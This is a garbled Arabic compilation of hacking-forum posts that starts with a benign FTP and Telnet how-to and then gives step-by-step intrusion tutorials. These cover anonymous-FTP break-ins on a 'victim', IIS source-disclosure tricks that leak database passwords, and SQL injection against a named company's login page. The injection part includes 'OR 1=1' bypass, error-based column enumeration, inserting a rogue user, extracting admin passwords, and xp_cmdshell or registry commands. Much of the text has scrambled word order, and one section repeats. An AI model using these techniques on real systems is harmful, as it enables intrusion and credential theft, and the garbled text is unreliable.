mget filename: الملفات من مجموعة .جلب
pwd: الحالي الدليل .طباعة
bye: البعيد النظام من والخروج االرتباط .انهاء
حساب باستخدام الملفات :Shell نقل
الملقن ادخال هو الملفات نقل من النوع هذا في ماتفعله أولفي حسابك تدخل سوف فمثال الخدمة توفير Tripod الخاصبشركة
طريق Unix Shell عن ، األمر أوال المرادة ftp نكتب بالوجهة متبوعاالمثال ftp ftp.tripod.com :فيصبح سبيل عل وهو االسم ندخل ثم
"IronPrivate" ، وبعد "******". مثال وهو السري الرقم بادخال نقوم ثمنفسأوامر استخدام يمكنك الحساب الى .المعتادة Unix الدخول
الـ نظام عن المعلومات من المزيد أردت Unixوإذا
الموقع هذا الى الدخوول : عليك
http://www.pc-worlds.net/lunexx.html
النظام هذا فى المبتدئين يفيد . فهو
المتصفح باستخدام الملفات :Browser نقل
سوى عليك فما جدا المتصفحاتسهل طريق عن الملفات نقلالموقع عنوان بكلمة URL ادخال العنوان ftp:// ويبدأ بدال العنوان ثمكلمة الـ http:// من موقع الى الدخول بعد العادية، FTPللعناوينالنقر سوى وماعليك ومجلدات ملفات عن عبارة الصفحة ستأتي
النزاله المطلوب الملف .على
حساب باستخدام الملفات :SLIP/PPP نقل
باستخدام لنا تسمح أنها الربط من النوع هذا استخدامات أفضلتابعة استخدامه .Client Programs برامج يمكن تابع برنامج وأفضل
برنامج Windows للنوافذ .Ws_ftp هو
برنامج :Ws_ftp LE 5.06 استخدام
البرنامج، أيقونة على المزدوج بالنقر وذلك البرنامج على ادخلحوار مربع لك تقوم Session Profile سيظهر خالله من والذي
خانة في اكتب الدخول، الدخول؛ Profile Name بتسجيل حساب اسمالمثال سبيل خانة My Home Page In Tripod على في Host واكتب
Name هو المثال هذا وفي الملقن خانة ftp.tripod.com اسم في ثمHost Type اختر Auto Detect نوع في التلقائي بالتدقيق يقوم لكي
خانة في االسم بكتابة قم ذلك بعد المضيف، الجهاز User ID نظام مثال خانة IronPrivate وهو في السري الرقم وسيظهر Password ثم
اضغط ******, ثم نجوم هيئة على OK مخفيا23. المطلوب الحساب الى بالدخول البرنامج سيقوم ذلك بعد
جهاز هو األيسر القسم قسمين؛ الى البرنامج نافذة وستنقسمفي المضيف، الكمبيوتر جهاز هو األيمن والقسم لديك الكمبيوتر
أو اسمائها تغيير أو الملفات ارسال أو جلب تستطيع المرحلة هذه . على ... حسابك محتويات في التحكم تستطيع أي الخ حذفها
فائقة بسهولة جهازك على أو .االنترنت
البعيد الشبكي االتصال باستخدام الملفات :Telnet نقل
Telnet ويسمح بعد عن الربط لخدمات معياري انترنت بروتوكول هيوكأنه جهازه جاعال مضيف كمبيوتر على جهازه بربط للمستخدم
. نظام العرضحسب ويختلف البعيد الكمبيوتر ذلك من جزء . نظام يستخدم البعيد الجهاز كان اذا المضيف Windows الكمبيوتربعضاألوامر معرفة فيجب آخر نظام يستخدم كان اذا أما مشكلة فال
" قائمة " لك يحضر والذي ؟ هو تعرفه أن يجب أمر وأهم للتحكم
الالزمة .باألوامر
برنامج - :Windows من Telnet استخدام
يسمى Windows ترفق سهال عليه Telnet برنامجا الدخول يمكنكابدأ قائمة على تشغيل Start بالضغط اكتب Run ثم Telnet ثم
.. من للبرنامج البدء صفحة لك Remote اختر Connect وستنفتحSystem. الحوار صندوق اكتبفي Connect في لك سيظهر الذيخانة Host Name خانة في اكتب ثم المضيف الجهاز ملقن Port اسم
) من ) اختر ثم هو، كما اتركه او لديك كان اذا المنفذ أو الميناء، Term Typeالـ . اضغط ذلك بعد بالتجربة قم واال لديك كان ان
Connect . السري والرقم االسم الدخال فستحتاج الربط يتم وعندمااختر النقل من االنتهاء قائمة Disconnectوبعد وبعد Connect من
اختر .Exit ذلك،،،انتهى
طريق " عن "FTP اإلختراق
> الهكر مدرسة منتدى من >منقول> hacker dz :الكاتب<
فتيبي عبر إقتحام طريقة نتناول سوف اليومFTP
البور الضحية لدى يكون ان يجب اإلقتحام لنجاح و أوال21
الخاصب البور هو و مفتوحFTP
هي و السكان برامج تستعمل ان عليك مفتوح البور أن من لتأكد واهمها من و كثيرة
Superscanneهي و الثانية الخطوة الى ننتقل مفتوح البور ان تتأكد بعدما
على إضغطStart ثمRun
اكتب ثمftp –n
عليها الدوسمكتوب في نافدة لك تطلع سوفFTP<
تمام شيء كل هنا لحد ؤوكياكتب بعدين و
Openعلى إضغط ثم إدخالEnter
التالية النتيجة عب تتحصل سوفFTP<To
بجانب أكتبTo
إدخال على إضغط ثم للضحية اإلبي رقممعي بالك خد اآلن و
تخطيتخطوة فقد الرد هدا على تحصلت إداConnected to www.assassin.com
220 websrv1 Microsoft FTP Service )Version 4.0(.التالية الكتابة أكتب اآلن و
ftp<quote user ftpتخطيتخطوة فقد الرد هدا على تحصلت إدا
331 Anonymous acces allowed, send identify )e-mail name( as password.
التالية الكتابة أكتب اآلن وftp<quote cwd ~root
تخطيتخطوة فقد الرد هدا على تحصلت إدا530 Please login with USER and PASS
التالية الكتابة أكتب ثمftp<quote pass ftp
تخطيتخطوة فقد الرد هدا على تحصلت إدااإلقتحام في نجحت و
230 Anonymous user logged in.الضحية جهاز في اآلن أنت مبروك
بإستعمال تقوم ان اال اآلن عليك ماالفتيبي اوامر
الي المشكلة في تقعو ال لكي الكرام مرور عليها امر لن طبعا وعلى فكرة ال و أعرف ما دون من اإلقتحام نجاح هي و فيها وقعت
من بقاليأكثر تضحكو ان اردتم إدا و الفتيبي انا 20اوامر و دقيقة لهدا و شيء أي أعمل أن دون من عالقة الضحية و اإليدي مجمد
اإلقتحام نجاح بعد مباشرةا تطبقوها لكي الىوامر بحضير قمت
Pwdديسك الهارد يحتويه ما تعر لكي
Cd مثال مجلد إلقتحامCd black
بالك المسمى مجلد بإقتحام قمت المثال هدا فيLs
ديسك الهارد أو المجلد محتوى لك يتضح لكيGet
جهازك بتاع المكتب الىسطح تحمل لكيمثال
Get black.exePut
ل العكسية العمليةGet
في تضعه و جهازك بتاع المكتب سطح ملفمن تأخد ان يعنيالضحية جهاز فيمثال
Put black.exeClos
الضحية مع اإلتصال لقطع
الي الرسائل أنواع على تطرق سون اآلن و األوامر أهم هديو شرحها و األوام تطبيق أثناء الضحية جهاز من عليها نتحصل
ارقامها
Codes: Signification:110 Restart marker reply.
120 Service ready in nnn minutes. )nnn est un temps(125 Data connection already open; transfer starting.150 File status okay; about to open data connection.
200 Command okay.202 Command not implemented, superfluous at this site.
211 System status, or system help reply.212 Directory status.
213 File status.214 Help message.
215 NAME system type.220 Service ready for new user.
221 Service closing control connection.225 Data connection open; no transfer in progress.
226 Closing data connection.227 Entering passive mode )h1, h2, h3, h4, p1, p2(.
230 User logged in, proceed.250 Requested file action okay, completed.
257 "PATHNAME" created.331 User name okay, need password.
332 Need account for login.350 Requested file action pendingfurther information.421 Service not available, closing control connection.
425 Can't open data connection.426 Connection closed; transfer aborded.
450 Requested file action not taken. )Fichier déjà utilisé par autre chose(
451 Requested action aborded: local error processing.452 Requested action not taken. )Pas assez de mémoire pour
exécuter l'action(500 Syntax error, command unrecognized.
501 Syntax error in parameters or arguments.502 Command not implemented.503 Bad sequence of commands.
504 Command not implemented for that parameter.
530 Not logged in.532 Need account for storing files.
550 Requested action not taken. )Fichier non trouvé, pas d'accès possible,...(
551 Requested action aborded: page type unknown.552 Requested file action aborded.
553 Requested action not taken. )Nom de fichier non attribué(
،،،انتهى
الـ " " SQLاختراق
> الحلم منتدى من >منقول> linuxray :الكاتب<
ال : االسكيو ماهي البداية في ؟؟) SQL ( س
واغلب جداول على تحتوي بيانات قاعد عن عبارة هي ال االسكيوب منتهية صفحاتها تكون التي تسحب ASP المواقع صفحات هي
بياناتهاقاعدة المعلومات ASP وصفحات SQL من من كنز تكون ان ممكنبيانات قواعد و SQL الختراق ، الحقا اليه اشير ماسوف SQL وهذا
البورت على 1433تتنصتال ان به اخبرك ان مااريد قاعدة SQL ايضا من اكثر على تحتوي قد
يمكن الجداول من عدد على تحتوي بيانات قاعدة وكل بياناتبيانات كبرقواعد تتصور التى SQL ان البيانات من الكبير والعدد
. تحتويها
بيانات : قاعدة اخترقت اذا منه استفيد ان يمكن مالذي ؟ SQL ساقصد ال منتدى الموقع هذا كان اذا الموقع نشاط حسب على هذا
منتديات PHP منتديات جميع ASP بل على تحصل الغالبسوف فياسماء
موضوع اي وحذف تعديل وبامكانك السر وكلمات المستخدمينميزة على يحتوي الموقع كان اذا اما ، بها تحلم تكن لم وصالحيات
، االيميالت من خيالية اعداد على تحصل فسوف المراسالت قائمةاذن ثريا تصبح وسوف واالعالن للدعاية شركة بانشاء قم عندها
_LinuxRay التنسىارقام - اشخاص معلومات بيانات قواعد داخل شئ اي تجد ان توقعتصبح - - ان ممكن ، الميالد تورايخ عناوين . Administrator هواتف
جديد من نشاطك استعد لكن االن الملل اصابك قد انه اعرفطويال مازال ... فالطريق
بيانات : قواعد على للدخول تحتاجة مالذي ؟ SQL س
لل فقط Passwd و User Name تحتاج
؟ : المرور وكلمة المستخدم اسم على احصل اين من س
على للحصول عديدة طرق كما User name and Passwd هناك منهاال نوع ASP اسلفصفحات من اخرى ثغرات sql.* وملفات هناك
يمكن كثيرثغرة مثل المرور كلمات على منها تحصل htr.+ ان
الثغرة هذه تستخدم : كيف
http://target/page.asp+.htr target : الهدف الموقع
Page : صفحة asp+.htr : الثغرة
حرف .... اي على التحتوي بيضاء صفحة بفتح احيانا تقوم الثغرة هذههو الفائدة منها اذن مالفائدة تتساءل سوف انك اعرف
الى اذهب البيضاء الصفحة هذه اوامر View Source خلف ترى لكيب الخاصة الوضع ASP البرمجة في تراها ان لك اليمكن التى
مثل : العادي
>%
Set DB= Server.CreateObject)"ADODB.Connection"(DB.Open "DRIVER=SQL
Server;SERVER=xxx;UID=sa;PWD=;APP=Microsoft )R( Developer Studio;WSID=xxx;DATABASE=moe_dbs", "_LinuxRay", "6666666"
%<-----------------------------------------------------------------
هو المستخدم اسم ان ترى السابق الكود LinuxRay_ فيهي السر 6666666وكلمة
-----------------------------------------------------------------
ال صفحة في خطأ هناك كان اذا احيانا انه المضحك مثل ASP الشئ: االتي
AMicrosoft VBScript runtime error '800a01a8'
Object required: 'Conn'
/filename.inc, line 5
بامتداد ينتهي ملف يتم inc.* هناك اوامر على يحتوي ملف هذاوكلمة المستخدم اسم على ويحتوي الملقم جانب من تنفيذها
المرور
الملففي اسم باضافة وذلك الملف هذا بسحب قم تنتظر ماذا اذنالموقع . عنوان
صفحة في االمر هذا مثل ترى ان ASP وممكنملف داخل البرمجة اوامر ان يعني هذا عليها الثغرة تطبيق عند
database.inc
>!--#include file = "database.inc"--<
ملفات مثل المرور كلمة على تحتوي ملفات عدة وهناك
global.asa++global.asa
beforemilion-global.asa-global.asamilion.sql
global-direct.asa
هو هذا لكن االسماء بهذه الملفات تكون ان الضرورة ليسمنمبرمجين قبل من عليه SQL المعتاد
االتي مثل الصفحة اسم تكتب ان فعله ماعليك : وكل
global.asa+.htr
في قديمة ثغرة صفحة IIS 3 هناك بعد تضيف ان هذا ASP وهييلي data$:: الرمز كما
file.asp::$dataعلى اال التعمل الثغرة فقط IIS 3 هذه بتطبيقها نفسك تتعب فال
اكثر ال . للعلم
المستخدم ... اسم على الحصول بعد ماذا النهاية من اقتربنا لقد؟؟ المرور وكلمة
ال قاعدة على الدخول !! SQL بعدها
استخدم انا البينات قاعدة على تدخل برامج عدة Visual هناكinterdev 6.0 السهل البرنامج استخدام افضل مازلت ACCESS لكني
2000
قائمة الى الذهاب البرنامح فتح هو فعله عليك ما كلFileاخترNew
اختار الجديدة الملفات قائمة ومنProject )Exiting Data(
موجودة بيانات قاعدة مشروع . اي
اختر الملف النشاء مربع لك سيظهرCreate
انشاء ايمربع سترى االن
Data Link Properties
اسم - بي االي او الموقع اسم معلومات لثالث فقط تحتاجالمرور - كلمة المستخدم
صندوق - 1 في الموقع اسم Select or enter server name ادخل
في - 2 المستخدم User Name اسم
السر - 3 Password كلمة
مربع ( مالحظة من الصح بإزالة )Blank Password قم
على البداية في الختبار Test Connection اضغط االسفل فيالعبارة هذه رأيت اذا البيانات بقاعدة Test Connection االتصال
Succeededبنجاح تم البيانات بقاعدة االتصال ان .فمعناه
القائمة من اليها الدخول تريد بيانات قاعدة اي تختار ان االن يمكنك: المسندلة
Select the data base on the serverعلى موافق OK واضغط . او
،،،انتهى
الـ " عن " SQLدرسمفصل
> اإلسالمية الحزم شبكة منتديات من >منقول> hish_hish :الكاتب<
نحن ما ومنها ديناميكيه صفحات إلستخدام المواقع غالبية أتجهتفيه موجودين
المعلومات من كبير كم فيها بيانات قواعد , وتستخدمالديناميكيه الويب لغات بإحدى مكتوب سكربت طريق أو PHP وعن
ASPالبيانات قواعد محركات مع جمب إلى جمبا تعمل . والتي
SQL Server , MySQL,Oracleالبقيه وترك المطلوبه المعلومات أستخالص يتم
بعضها ويستخدم تعالج ثم ومن المستخدم من معلومات تأخذ حيثتكون في
الـ بعض SQL أوامر صحة من التأكد أو البيانات أستخالص ليتملبناء المدخالت
رفضه أو المستخدم قبول أو المطلوبه الصفحةالتي الصفحات في مرور وكلمة مستخدم أسم طلب يتم دائما
ال عمل بعمل تخولكبها للقيام الصالحيه بإعطائه الموقع صاحب قام من إال به يقوم
موضوعي بحذف يقوم القائمه كأن في تثبيته أو (((وأن البيانات قاعدة في المستخدم أسم وجود من التأكد يتم حيث
أسم بجانب الموجوده لتلك مطابقه المعطاه المرور كلمةالمستخدم
الـ أمر في وتضمينها معلومه أخذ يتم بالتأكد SQL حيث يقوم الذيوصالحيتها وجودها من
للتأكد المستخدم بتوثيق يقوم سكربت كتابة عند الحذر يجب ولكنال أم المحميه للصفحه بالدخول له مخول أنه من
من وخلوها المستخدم من المستقبله القيم نظافة من بالتأكد وذلكالـ أمر تجعل أن شأنها من رموز خاطئ SQL أي
به مسموح غير أمر بأي القيام أو بنائه في
يسمى ما عن اآلن SQL injection سنتكلمموقع بوجود وأيضا التوثيق سكربت كتابة ضعففي أنه حيث
للتجربهالسعوديه اإلتصاالت شركة موقع وهو
الموقع /http://www.stc.com.sa عنوانخدمة يختصبمقدمي رابط نجد الرئيسيه للصفحة الدخول عند
السعوديه في أنترنتhttp://www.stc.com.sa/arabic/scripts...asp?pagenum=25 وهو
مرور وكلمة مستخدم أسم منك يطلب فأنه دخوله !!!! عندالـ هو لنا يتبادر ما أول هذه الحاله في SQL injection دائما
بتجربة نقوممستخدم ' : أسم
مرور ' : وكلمةالتالي الخطأ على فنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
quotation mark before the character string '' '. /arabic/Scripts/ar_csd_reply.asp, line 33
________________________________________
التالي الخطا يظهر الحاالت بعض وفي :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed
quotation markbefore the character string ''' AND Password=''.
/admin/admin.asp, line 13________________________________________
الـ أمر من جزء على حصلنا هذا الخطأ أحد SQL وفي أسم وأيضاالجدول في األعمده
عمل أمكانية يؤكد ما للتحقق SQL Query للـ inject وهو المستخدمه
المدخله المرور وكلمة المستخدم أسم . صالحيةالـ عن لنتكلم التفصيل SQL injection إذن من بشيء
المستخدم اسم صالحية من بالتأكد يقوم سكربت لدينا كان لوبالطريقة منها سنتحقق قأننا المستخدم من المدخله المرور وكلمة
التاليهcode:
________________________________________
SELECT * from Users WHERE User_Name='>field from web form<' AND Password='>field from web form<'
if) TRUE ({Login OK
}else {
Login FAILD}
________________________________________
يقوم فأنه المحميه للصفحة بالدخول لهم المسموح أحد قيام عندبالدخول له يسمح أن قبل نفسه بتوثيق تأكيد بكل
به الخاصه المرور وكلمة المستخدم أسم بأدخال قيامه فعندالمستخدم admin : أسم
المرور t0ps3cr3t : كلمةالـ امر شكل التالي SQL فإن بالشكل : سيصبح
code:________________________________________
SELECT * from Users WHERE Users_Name='admin' AND Password='t0ps3cr3t'
________________________________________
جدول في سطر وجود يكون User وعند أن وهو الشرط فيه تحققالمستخدم المرور admin اسم t0ps3cr3t وكلمة
قيمة بإرجاع سيقوم األمر مخول TRUE فأن المستخدم أن أي. بالدخول
إرجاع سيتم ذلك الدخول FALSE غير رفض وسيتم
الـ : بأوامر المعرفه من القليل ولو لديك يكون أن يجب SQL مالحظه.
>field from web form< صفحة في المستخدم أدخله ما محلها يحلصالحيته من التحقق
لكلمة ' وبالمثل مستخدم كإسم بإدخال قمنا عندما تجربتنا فيالـ أمر فأن التالي SQL المرور بالشكل : أصبح
code:________________________________________
SELECT * from Users WHERE User_Name=' ' ' AND Password=' ' '________________________________________
عالمة وبقي التنصيصاألولى عالمة بإغالق قمنا أننا ونالحظ
بعد تغلق تنصيصلمالخطأ رسالة لظهور أدى ما !! وهو
مستخدم ا�م بتجربة نقوم blah' OR '1'='1 : األنالمرور لكلمة .ومثلها
الـ أمر شكل SQL فيصبحcode:
________________________________________
SELECT * from Users WHERE User_Name='blah' OR '1'='1' AND Password='blah' OR '1'='1'
________________________________________
حدا على جزء كل األمر لنحللSELECT * from Users
الجدول من السطور جميع أختر Users تعنيWHERE User_Name='blah' OR '1'='1' AND Password='blah' OR
'1'='1'الذي وهو بإختياره سنقوم الذي السطر بتحديد نقوم الجزء هذا في
الشروط فيه تتحقق'blah' OR '1'='1'
بوجود أصبحتشرط OR هنا ولكن نصيه قيمة تصبح لماألطراف من األقل على واحد طرف كان إذا صحيح الشرط يصبح
الشرطصحيح في المشتركههو األول الطرف فإن حالتنا 'blah' وفي
قيمة عن يعبر االن صددها في لسنا تفاصيل الخوضفي بدون وهوTRUE صحيحه
هو ' األخر 1'='1والطرف 'كانت إذا عن اإلجابة لـ 1يمكنك ال 1مساويه أم !!!!
هو تحليله بعد الشرط شكل سيكون TRUE OR TRUE إذاللشرطهي النهائيه النتيجه فإن TRUE وبالتالي
المرور لكلمة تحدث التفاصيل ونفس : القيمه جدا مهمه ليست TRUE مالحظه الشرط من نحصلها التيللكلمه بنا TRUE مساويه الخاصه المفاتيح لوحة على نكتبها التي
مستخدم أسم إستخدام تحاول ال مرور TRUE لذلك TRUE وكلمةالـ SQL injection إلتمام
الجدول من سطر أول بأختيار سيقوم السابق ويرجع Users الشرطمصفوفه في محتوياته
للصفحة الدخول أستطعت قد أنك ستجد الحاالت بعض في وبالتالي المحميه
ال أخرى حاالت في ولكنالتفاصيل ..... لنكمل
الـ أمر في الشرط يكون ربما ألنه التنبه بعد SQL يجب يأتي ما وهوWHERE أشياء عدة من يتحقق
نستخدم يمكننا , )two dashes( -- لذلك حيث السطر بقية إهمال ليتمالتاليه بالمدخالت قليل قبل أدخالناه ما عن اإلستعاضه
مستخدم --'blah' OR '1'='1 : أسمكلمة ) كتابة إهمال يمكنك الحاالت بعض في المرور كلمة وكذلك
الـ -- أمر في المستخدم اسم بعد تأتي ألنها ستهملها ألن SQL مرور
أحد لتخمين تحتاج لن أنك بحيث ومضمونه جدا مريحه طريقه توجداألعمده أسماء
أستخدام having clause وهيالتاليه بالطريقه
مستخدم 'having 1=1-- أسمكالتاليه خطأ رسالة على سنحصل حيث
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column 'cs_isp_user.UserID' is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY
clause.
/Arabic/Scripts/ar_csd_reply.asp, line 33 عمود أول أسم وأيضا الجدول أسم وبها
األعمده بقية اسماء على الحصول لنستطيع بعدهاgroup by سنستخدم
التالي بالشكل--group by cs_isp_user.UserID'
أسمه عمود على سنحصل passwd بعدهاالتالي بالشكل يليه اللي العمود اسم على للحصول فنستخدمه
--group by cs_isp_user.UserID,cs_isp_user.passwd'صفحة على نحصل أن إلى العمود مع جدول كل أسم زيادة ونكرر
خاطئ المستخدم أسم بأن ! تخبرنا
في األعمده أسماء من ممكن قدر أكبر بجمع نقوم أن األن نحتاجالجدول هذا
التالي بإدخال : نقوممستخدم --)blah' group by )username : أسم
التالي الخطأ على : فنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column
name 'username'. /arabic/Scripts/ar_csd_reply.asp, line 33
________________________________________
األسم له الجدول هذا في عمود يوجد ال بأنه يفيد ما username وهومثل الشائعه األسماء بتجربه نقوم
password ,username,id,userid,email,first_name
لـ تجربتنا عنه userid عند نبحث ما وهو أخر خطأ على نحصل فأننا :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column
'cs_isp_user.passwd' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY
clause. /arabic/Scripts/ar_csd_reply.asp, line 33
________________________________________
وهو الجدول أسم وهي معلومتين على حصلنا cs_isp_user هناوهو األعمده أحد أسم passwd وأيضا
الجديد العمود اسم بإستخدام ولكن السابق العمل بتكرار االن نقومالتالي المستخدم أسم بإدخال --)blah' group by )passwd : فنقوم
التالي الخطأ على : فنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]Column
'cs_isp_user.UserID' is invalid in the select list because it is not contained in either an aggregate function or the GROUP BY
clause. /arabic/Scripts/ar_csd_reply.asp, line 33
________________________________________
وهو عمود أسم على وهو UserID حصلنا بتخمينه قمنا ما نفسه وهوuserid
أن إلى اإلشاره األحرف MS SQL Server تجدر ليسحساسلحالةأسماء على إال نحصل وال منتهيه غير حلقه في سنكون أننا نالحظ
passwd و UserID الجداولعليها حصلنا التي وهي عمودين على إال يحوي ال الجدول إذنوبعدها للجدول جديد مستخدم بأدخال نقوم هذه الحاله في إذن
بتسجيل الخاصه الصفحه من طبيعي بشكل بالدخول نقوم الدخول
المستخدم أسم خانة في التالي بكتابة blah' INSERT INTO : سنقومcs_isp_user)UserID,passwd
( VALUES)'M_3','hi'(--مستخدم أسم له جديد مستخدم إضافة سيتم مرور M_3 حيث وكلمة
hiأنك على البيانات بهذه المحميه للصفحة الدخول تستطيع وبعدها
بالدخول له مخول
) عمل ) أمكانية استغالل من أنتهينا اإلتصاالت شركة مثالنا inject فيقرائة نستطبع لكي ممتعه طريقه عن الحديث سنكمل ولكننا لها
بأي الدخول تستطيع وبعدها مرورهم وكلمات المستخدمين اسماءنفسك إضافة دون منها
لشخصمشبوه وجود حول شكوك يضع لن الذي األمر وهواألسم له أخر عمود بإضافة ولكن بدأناه ما رقم id سنكمل وهو
) رقم ) أنه تذكر مستخدم لكل تسلسليأسمه جدول لدينا user إذن
التاليه االعمده يحويid صحيح رقم وهو
username ) أرقام ) تحوي أن يمكن النصيه القيم نصيه قيمة وهو
admin1 مثالpasswd نصيه قيمه أيضا وهي
عمل يتم ) union نجرب لن عدديه قيمة إلى وتحويلها نصيه لقيمه) جدا ثمينه خطأ رساله سيخرج ولكنه التحويلالمستخدم اسم blah' union SELECT username FROM user : ندخل
شيء في تفيدنا ال خطأ رسالة على سنحصل وهي الخطأ رسالة :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e14' [Microsoft][ODBC SQL Server Driver][SQL Server]All queries in an SQL statement containing a UNION operator must have an equal
number of expressions in their target lists. /admin/admin.asp, line 13
________________________________________
بزيادة التالي id نقوم بالشكل فتصبح واحد مرهblah' union SELECT username,username FROM user
الخطأ نفسرسالة على فنحصلمختلفه خطأ رسالة على نحصل أن إلى الزياده نتابع
اسم أدخال عند الجديده الخطأ رسالة على حصلنا أننا لنفترضالتالي المستخدم
blah' union SELECT username,username,username,username,username FROM user
التاليه الخطأ رسالة على فنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting thevarchar value 'Lame_Admin' to a column of data type int.
/admin/admin.asp, line 13________________________________________
لألدمن يكون ما عادة وهو مستخدم أسم أول على حصلنامحرك من نطلب ألننا هو الخطأ هذا ظهور يقوم SQL وسبب أن
نصيه قيمة عدديه )Lame_Admin وهي( بتحويل قيمة إلى)int (صحيحه
يستطيع , ال أنه بأخبارك يقوم لذلك مسموح الغير الشيء وهوصحيحه Lame_Admin تحويل عدديه قيمة أذكىشي إلى هذا
بعمله microsoft قامتكلمة على الحصول وسنحاول المستخدم أسم على حصلنا االن
المرورالتالي المستخدم أسم blah' union SELECT: ندخل
passwd,passwd,passwd,passwd,passwd FROM user
المستخدم أسم على حصولنا عند السابق العدد بنفس
الخطأ هذا على سنحصل :اقتباس
________________________________________
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error
converting thevarchar value 'stupid' to a column of data type int.
/admin/admin.asp, line 13________________________________________
الدخول تسجيل ويمكننا المرور وكلمة المستخدم أسم على حصلنالنا أثر أي وجود بدون المحميه للصفحة
بعض بطباعة تقوم لها الدخول عند المحميه الصفحه كانت إذا إالبإسم بالدخول شخضقام ألخر االيبي رقم مثل المعلومات
هذا المستخدمبنفسك به ستقوم بما فكر عندها
الـ عن أتكلم Stored Procedure بقيمسبقا موجوده أدوات إلى أقرب كتشبيه بعمل Built-in وهي تقوم
طلبها عند محدد
الـ من اإلستفاده الـ Stored Procedure ستستطيع كان SQL إذاServer المستخدم على sa يعمل
الـ عليه يعمل الذي المستخدم كان إذا له SQL Server أو السماح تمبا�ستخدامها
على حصولك عند محظوظ فأنت األمكانيات SQL Server لذلك بهذه
من أكثر 100يوجد Stored Procedure أهمها التالي الجدول في
+---------------------------+------------------------------------------------------------------------------+
| xp_cmdshell----------| ( على تنفيذه يتم التشغيل لنظام أمر تمرير) المستخدم صالحيات |-------حسب
| xp_regread-----------| في مفتاح قيمة قراءة|--------------------------------------------الريجستري
| xp_regdeletekey----| من مفتاح حذف|-------------------------------------------------الريجستري
| xp_regdeletevalue-| من مفتاح قيمة حذف|--------------------------------------------الريجستري
| xp_regwrite ----------| في للكتابة|-------------------------------------------------------الريجستري
| xp_servicecontrol--| على خدمة أنهاء أو لبدأ|--------------------------------------------السيرفر
+----------------------------+-----------------------------------------------------------------------------+
الـ هذه من أي من اإلستفاده طريقة بالشكل Procedure أما فهيالتالي
'exec master..xp_cmdshell 'dir
أستخدام لطريقة مثال مثله xp_cmdshell هذا والبقيهالتالي بالشكل فهو الريجستري في الكتابة عدا
'exec master..xp_regwrite 'REGISTERY KEY' VALUE
ملفات كود قراءة بأمكانك أنه إلى اإلشاره بقي يعمل asp أيضا التيصفحة كود نسخ ثم ومن جديد جدول إضافة طريق عن الموقع عليها
asp ووضعه
التاليه بالطريقة الجدول هذا في))CREAT TABLE M_3 ) source varchar)8000
الجدول وأسم الجدول ببناء يقوم السطر عمود M_3 هذا وبداخلهالنوع من بايت 8000حجمه varchar واحد
الجدول هذا إلى السيرفر على ملف أي إضافة االن بأمكانك ذلك بعدالتالي بالشكل قرائته ثم ومن
'bulk insert M_3 from 'c:\InetPub\wwwroot\login.asp
اللي الخطأ رسائل طريق عن ذلك يمكنك نسخه تم ما ولقرائةالسابق الموضوع في عنها تكلمنا
عمل هو نسخه union أسهلها تم ما بها خطأ رسالة توليد يتم .حيث24. المطلوب الحساب الى بالدخول البرنامج سيقوم ذلك بعد
جهاز هو األيسر القسم قسمين؛ الى البرنامج نافذة وستنقسمفي المضيف، الكمبيوتر جهاز هو األيمن والقسم لديك الكمبيوتر
أو اسمائها تغيير أو الملفات ارسال أو جلب تستطيع المرحلة هذه . على ... حسابك محتويات في التحكم تستطيع أي الخ حذفها
فائقة بسهولة جهازك على أو .االنترنت
البعيد الشبكي االتصال باستخدام الملفات :Telnet نقل
Telnet ويسمح بعد عن الربط لخدمات معياري انترنت بروتوكول هيوكأنه جهازه جاعال مضيف كمبيوتر على جهازه بربط للمستخدم
. نظام العرضحسب ويختلف البعيد الكمبيوتر ذلك من جزء . نظام يستخدم البعيد الجهاز كان اذا المضيف Windows الكمبيوتربعضاألوامر معرفة فيجب آخر نظام يستخدم كان اذا أما مشكلة فال
" قائمة " لك يحضر والذي ؟ هو تعرفه أن يجب أمر وأهم للتحكمالالزمة .باألوامر
برنامج - :Windows من Telnet استخدام
يسمى Windows ترفق سهال عليه Telnet برنامجا الدخول يمكنكابدأ قائمة على تشغيل Start بالضغط اكتب Run ثم Telnet ثم
.. من للبرنامج البدء صفحة لك Remote اختر Connect وستنفتحSystem. الحوار صندوق اكتبفي Connect في لك سيظهر الذيخانة Host Name خانة في اكتب ثم المضيف الجهاز ملقن Port اسم
) من ) اختر ثم هو، كما اتركه او لديك كان اذا المنفذ أو الميناء، Term Typeالـ . اضغط ذلك بعد بالتجربة قم واال لديك كان ان
Connect . السري والرقم االسم الدخال فستحتاج الربط يتم وعندمااختر النقل من االنتهاء قائمة Disconnectوبعد وبعد Connect من
اختر .Exit ذلك،،،انتهى
طريق " عن "FTP اإلختراق
> الهكر مدرسة منتدى من >منقول> hacker dz :الكاتب<
فتيبي عبر إقتحام طريقة نتناول سوف اليومFTP
البور الضحية لدى يكون ان يجب اإلقتحام لنجاح و أوال21
الخاصب البور هو و مفتوحFTP
هي و السكان برامج تستعمل ان عليك مفتوح البور أن من لتأكد واهمها من و كثيرة
Superscanneهي و الثانية الخطوة الى ننتقل مفتوح البور ان تتأكد بعدما
على إضغطStart ثمRun
اكتب ثمftp –n
عليها الدوسمكتوب في نافدة لك تطلع سوفFTP<
تمام شيء كل هنا لحد ؤوكياكتب بعدين و
Openعلى إضغط ثم إدخالEnter
التالية النتيجة عب تتحصل سوفFTP<To
بجانب أكتبTo
إدخال على إضغط ثم للضحية اإلبي رقم
معي بالك خد اآلن و
